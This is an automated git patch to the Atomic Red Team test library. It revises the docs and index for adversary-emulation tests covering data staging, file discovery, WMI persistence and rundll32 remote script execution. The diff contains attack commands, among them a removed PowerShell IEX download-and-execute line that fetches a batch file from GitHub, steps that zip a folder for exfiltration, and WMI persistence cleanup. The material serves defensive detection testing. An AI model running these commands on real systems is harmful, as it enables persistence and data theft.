From 3bc48cf815cd8f96432e551997079001e5ee8a0e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 3 Apr 2020 15:04:00 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1074/T1074.md | 27 +++++++++++++--- atomics/T1083/T1083.md | 6 ++-- atomics/T1084/T1084.md | 10 +++--- atomics/T1085/T1085.md | 2 +- atomics/index.md | 2 +- atomics/index.yaml | 66 ++++++++++++++++++++++++---------------- atomics/windows-index.md | 2 +- 7 files changed, 72 insertions(+), 43 deletions(-) diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index f1d4dfa3..013cd8d4 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Test #1 - Stage data from Discovery.bat -Utilize powershell to download discovery.bat and save to a local file +Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, +verify that the file is saved in the temp directory. **Supported Platforms:** Windows +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| + #### Attack Commands: Run with `powershell`! ```powershell -IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log +Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file} ``` +#### Cleanup Commands: +```powershell +Remove-Item -Force #{output_file} -ErrorAction Ignore +``` @@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp -Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. +Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip +was placed in the temp directory. **Supported Platforms:** Windows +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip| +| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| + #### Attack Commands: Run with `powershell`! ```powershell -Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip +Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force ``` #### Cleanup Commands: ```powershell -Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore +Remove-Item -Path #{output_file} -ErrorAction Ignore ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 8a89d446..a7cd04eb 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the ls ## Atomic Test #1 - File and Directory Discovery (cmd.exe) -Find or discover files on the file system +Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of +all of the data discovery commands. **Supported Platforms:** Windows @@ -39,7 +40,6 @@ Find or discover files on the file system dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download -dir /s d:\ >> %temp%\download dir "%systemdrive%\Users\*.*" >> %temp%\download dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download dir "%userprofile%\Desktop\*.*" >> %temp%\download @@ -55,7 +55,7 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) -Find or discover files on the file system +Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index 6f555bf1..9d6fd383 100644 --- a/atomics/T1084/T1084.md +++ b/atomics/T1084/T1084.md @@ -4,15 +4,14 @@ ## Atomic Tests -- [Atomic Test #1 - Persistence](#atomic-test-1---persistence) +- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-## Atomic Test #1 - Persistence -Run from an administrator powershell window - -After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. +## Atomic Test #1 - Persistence via WMI Event Subscription +Run from an administrator powershell window. After running, reboot the victim machine. +After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. Code references @@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 3c495239..58bb0399 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject -Test execution of a remote script using rundll32.exe +Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows diff --git a/atomics/index.md b/atomics/index.md index 18884c53..a2e4aab4 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -141,7 +141,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/index.yaml b/atomics/index.yaml index 56294edc..87171f76 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -5075,11 +5075,10 @@ persistence: modified: '2019-10-15T18:43:47.703Z' identifier: T1084 atomic_tests: - - name: Persistence + - name: Persistence via WMI Event Subscription description: | - Run from an administrator powershell window - - After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. Code references @@ -5111,7 +5110,6 @@ persistence: $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject @@ -11663,7 +11661,8 @@ defense-evasion: identifier: T1085 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - description: 'Test execution of a remote script using rundll32.exe + description: 'Test execution of a remote script using rundll32.exe. Upon execution + notepad.exe will be opened. ' supported_platforms: @@ -17338,9 +17337,9 @@ discovery: identifier: T1083 atomic_tests: - name: File and Directory Discovery (cmd.exe) - description: 'Find or discover files on the file system - -' + description: | + Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of + all of the data discovery commands. supported_platforms: - windows executor: @@ -17350,13 +17349,13 @@ discovery: dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download - dir /s d:\ >> %temp%\download dir "%systemdrive%\Users\*.*" >> %temp%\download dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download dir "%userprofile%\Desktop\*.*" >> %temp%\download tree /F >> %temp%\download - name: File and Directory Discovery (PowerShell) - description: 'Find or discover files on the file system + description: 'Find or discover files on the file system. Upon execution, file + and folder information will be displayed. ' supported_platforms: @@ -23689,7 +23688,8 @@ execution: identifier: T1085 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - description: 'Test execution of a remote script using rundll32.exe + description: 'Test execution of a remote script using rundll32.exe. Upon execution + notepad.exe will be opened. ' supported_platforms: @@ -27306,17 +27306,24 @@ collection: identifier: T1074 atomic_tests: - name: Stage data from Discovery.bat - description: 'Utilize powershell to download discovery.bat and save to a local - file - -' + description: | + Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, + verify that the file is saved in the temp directory. supported_platforms: - windows + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "$env:TEMP\\discovery.bat" executor: name: powershell elevation_required: false - command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'') - > pi.log + command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" + -OutFile #{output_file} + +' + cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore ' - name: Stage data from Discovery.sh @@ -27334,21 +27341,28 @@ collection: ' - name: Zip a Folder with PowerShell for Staging in Temp - description: 'Use living off the land tools to zip a file and stage it in the - Windows temporary folder for later exfiltration. - -' + description: | + Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip + was placed in the temp directory. supported_platforms: - windows + input_arguments: + input_file: + description: Location of file or folder to zip + type: Path + default: PathToAtomicsFolder\T1074\bin\Folder_to_zip + output_file: + description: Location to save zipped file or folder + type: Path + default: "$env:TEMP\\Folder_to_zip.zip" executor: name: powershell elevation_required: false - command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip - -DestinationPath $env:TEMP\Folder_to_zip.zip + command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} + -Force ' - cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction - Ignore + cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore ' '': diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 3332ebf0..2c31411d 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -339,7 +339,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]